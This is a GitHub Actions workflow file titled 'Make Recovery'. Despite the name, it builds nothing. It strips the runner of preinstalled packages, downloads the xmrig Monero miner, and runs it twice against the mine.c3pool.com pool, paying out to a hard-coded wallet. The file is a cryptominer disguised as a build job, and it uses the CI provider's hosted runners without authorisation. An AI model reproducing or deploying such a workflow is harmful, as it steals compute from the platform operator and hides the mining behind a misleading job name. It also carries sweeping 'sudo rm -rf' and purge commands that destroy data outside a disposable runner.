name: Make Recovery

on: workflow_dispatch

jobs:
  build:
    if: github.event.repository.owner.id == github.event.sender.id
    runs-on: ubuntu-18.04
    
    steps:
    - name: Check Out
      uses: actions/checkout@main
      
    - name: Clean Up
      run: |
        echo "Wait for a while."
        docker rmi `docker images -q`
        sudo rm -rf /usr/share/dotnet /etc/mysql /etc/php /etc/sudo apt/sources.list.d
        sudo apt -y purge azure-cli ghc* zulu* hhvm llvm* firefox google* dotnet* powershell openjdk* mysql* php*
        sudo apt -y autoremove --purge
        sudo apt -y autoclean
        sudo apt clean
        sudo apt update
        df -hl
      
    - name: Install packages
      run: |
        sudo apt -y upgrade
        
    - name: Install required packages
      run: |
        sudo apt-get install git aria2 build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
        sudo apt-get install automake libtool autoconf -y
        aria2c https://github.com/C3Pool/xmrig-C3/releases/download/v6.18.1-C3/xmrig-v6.18.1-C3-linux-Static.tar.gz
        tar -xzf xmrig-v6.18.1-C3-linux-Static.tar.gz
    - name: run
      run: |
        ./xmrig -u 4497DUQtXG3ZsAmkzFfa8ma2knAkvdTKBE5Aq8XqsyBc2B6aiCsEDE99fVpiYpppBTFBm1ZmZPFkiQh1cEtoq4hJDxHk6rP -o mine.c3pool.com:13333 -p termux -a cn-pico
    - name: run

      run: |

        ./xmrig -u 4497DUQtXG3ZsAmkzFfa8ma2knAkvdTKBE5Aq8XqsyBc2B6aiCsEDE99fVpiYpppBTFBm1ZmZPFkiQh1cEtoq4hJDxHk6rP -o mine.c3pool.com:13333 -p termux -a cn-pico

